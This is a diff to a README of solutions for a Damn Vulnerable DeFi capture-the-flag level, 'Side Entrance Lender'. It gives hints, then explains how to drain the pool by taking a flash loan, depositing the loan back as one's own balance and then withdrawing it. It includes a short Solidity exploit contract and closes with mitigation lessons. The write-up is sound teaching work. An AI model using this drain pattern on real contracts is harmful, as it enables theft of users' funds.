lior-abadi/damn-vulnerable-defi-solutions/README.md

 - To rely on logic, tokens can only be borrowed by contracts.
 Individual wallets cannot perform further logic such as contracts do.

 **And remember, if a suited guy flexing cars and watches comes by offering huge APY's, run away.
 It is a scheme.**
+⠀
+⠀
+⠀
+## 4) Side Entrance Lender
+### Catch - Hints
+We need to look closely how does the balance of this contract is modified.
+Think this contract as a big water tank with two inlets of water and oil and two outlets that checks its level.
+It is basically saying... "if my level is constant, the mixture inside is constant".
+What if we decide to turn of the water inlet and fill it back with oil (keeping the outlets open).
+The level will remain constant but... there will no more water inside the tank!
+This level can be cracked by thinking how things remain constant and how they may change...

+### Solution
+We may trick the contract with the ```deposit``` and ```withdraw```logic combined with the request for a ```flashLoan```.
+If we follow this path we will be able to empty the contract:

+1) Ask for a loan for its whole balance.
+2) When the ```execute``` function is triggered, we can give the ethers back by calling ```deposit```.
+This will make the pool balance to match the ```require``` condition and the ```flashLoan``` function will be mined completely.
+Also, this assigns the ```SideCracker``` contract a balance inside the ```balances```mapping stored on the pool contract.
+In other words, we returned back the tokens but we assigned them as our property as for the pool logic.
+3) Because we now hold a balance as our property, we can simply call the ```withdraw``` function and draining the pool!

+The contract that exploits this pool is within the same folder as the contract of this level but the logic will be something like this:

+    receive() external payable {}

+    function drainPool() public payable {
+        callFlashLoan();

+        pool.withdraw();
+        payable(attacker).transfer(address(this).balance);
+    }

+    function callFlashLoan() public {
+        uint256 poolBalance = address(pool).balance;
+        pool.flashLoan(poolBalance);
+    }

+    function execute() external payable {
+        pool.deposit{value: msg.value}();
+    }

+Call ```drainPool`` and **kboom**!

+### Learnings - Mitigations
+- Be always wary about side entrance functions that may change the checked condition making a kind of illusionism show.
+- The fact that some variables remain the same after a call it is not a sign that the new state is exactly the same.